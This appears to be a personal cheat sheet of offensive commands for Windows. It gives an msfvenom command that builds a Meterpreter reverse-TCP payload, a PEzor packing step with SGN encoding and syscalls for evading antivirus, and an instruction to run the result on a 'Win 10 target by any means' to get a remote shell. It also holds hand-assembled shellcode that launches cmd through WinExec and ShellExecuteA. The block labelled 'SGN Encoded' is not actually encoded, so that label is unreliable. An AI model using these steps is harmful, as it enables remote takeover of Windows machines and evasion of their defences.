The following are my helpful short opcodes to open Command Prompt for testing against vulnerable apps.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=8081 -o /opt/lol64 --format raw
- PEzor located here:
bash PEzor/ -64 -sgn -text -syscalls -sleep=42 lol64
Run the exe on our Win 10 target by any means.
Boom, full meterpreter via multihandler!
33c0 ; Clear out eAX
50 ; Use "0" for (B) of winexec if we just want the smallest shellcode
; "0" from eAX will be equivalent to SW_HIDE constant [1].
68636d6400 ; Push "cmd" (A)
8bcc ; Mov ecx,esp
53 ; Push eBX (B)
51 ; Push eCX (A)
b86ef47875 ; My location of winexec(A,B) in kernel32 DLL, ASLR will change this on every boot.
ffd0 ; Call eAX (fire!)
SGN Encoded (single round):
68636d6400 ; push "cmd"
8bdc ; Mov ebx, esp
6a00 ; Push nullbyte to end "open" string
686f70656e ; Push "open"
8bcc ; Mov ecx, esp
6a05 ; Push "5" for SW_SHOW constant [1].
33c0 ; Xor eax with itself (0 it out)
50 ; Push eax (null, or "0")
50 ; Push eax
53 ; Push ebx
51 ; Push ecx
50 ; Push eax
b8c0877a76 ; My location of ShellExecuteA(x,x,x,x,x,x) in shell32 DLL, ASLR will change this on every boot.
ffd0 ; Call eax